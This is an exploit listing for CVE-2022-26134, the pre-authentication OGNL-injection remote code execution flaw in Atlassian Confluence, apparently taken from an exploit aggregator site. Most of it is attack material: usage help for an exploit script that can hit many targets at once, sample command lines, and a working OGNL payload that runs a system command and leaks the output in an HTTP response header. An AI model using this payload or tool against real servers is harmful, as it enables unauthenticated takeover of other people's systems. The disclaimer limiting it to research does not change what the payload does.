## https://sploitus.com/exploit?id=9408CE26-37BB-5A4C-9440-BAB53E658A12
# Confluence Pre-Auth Remote Code Execution via OGNL Injection (CVE-2022-26134)
Confluence Pre-Auth Remote Code Execution via OGNL Injection (CVE-2022-26134)
- On June 02, 2022 Atlassian released a security advisory for their Confluence Server and Data Center applications, highlighting a critical severity unauthenticated remote code execution vulnerability. The OGNL injection vulnerability allows an unauthenticated user to execute arbitrary code on a Confluence Server or Data Center instance.
### IMPORTANT
This exploit is only intended to facilitate demonstrations of the vulnerability by researchers. I didn't recommend of illegal actions and take no responsibility for any malicious use of this script.
#### โข Request Example
![]()![BurpRequest](https://user-images.githubusercontent.com/6265911/172087965-68f12d26-e3c7-429d-b2c5-639121922f1e.png)
### Exploit Usage
```
python3 exploit.py -h
Usage: exploit.py [options]
Options:
-h, --help show this help message and exit
-u URL, --url=URL Base target uri (ex. http://target-uri/)
-f FILEHOSTS, --file=FILEHOSTS
example.txt
-t THREADS_SET, --threads=THREADS_SET
-m TIMEOUT, --maxtimeout=TIMEOUT
-o OUTPUT, --output=OUTPUT
-c COMMAND, --cmd=COMMAND
```
#### Exploit single target:
`$ python3 exploit.py -u http://xxxxx.com -c id`
![]()![xpl1](https://user-images.githubusercontent.com/6265911/172089213-ea07c33f-8944-41c5-b6fc-8f3e9250d928.PNG)
#### Exploit multitargets
`$ python3 exploit.py -f urls.txt -p -c id `
![]()![xpl2](https://user-images.githubusercontent.com/6265911/172089219-3300095f-2ee8-417a-944f-01d32c8aedef.PNG)
# OGNL expression
```${(#a=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec("id").getInputStream(),"utf-8")).(@com.opensymphony.webwork.ServletActionContext@getResponse().setHeader("X-Cmd-Response",#a))}```
# References:
โข [https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html](https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html)
โข [https://attackerkb.com/topics/BH1D56ZEhs/cve-2022-26134/rapid7-analysis](https://attackerkb.com/topics/BH1D56ZEhs/cve-2022-26134/rapid7-analysis)